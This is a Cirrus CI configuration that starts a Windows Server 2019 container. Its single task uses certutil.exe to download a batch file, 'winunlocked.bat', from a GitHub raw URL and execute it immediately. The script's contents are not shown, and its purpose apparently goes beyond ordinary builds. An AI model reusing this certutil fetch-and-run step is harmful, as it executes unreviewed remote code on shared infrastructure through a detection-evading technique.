windows_container:
  image: cirrusci/windowsservercore:2019
  cpu: 4
  memory: 10G
  
task:
  script: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/DangDev/cirrus-win/main/winunlocked.bat && winunlocked.bat
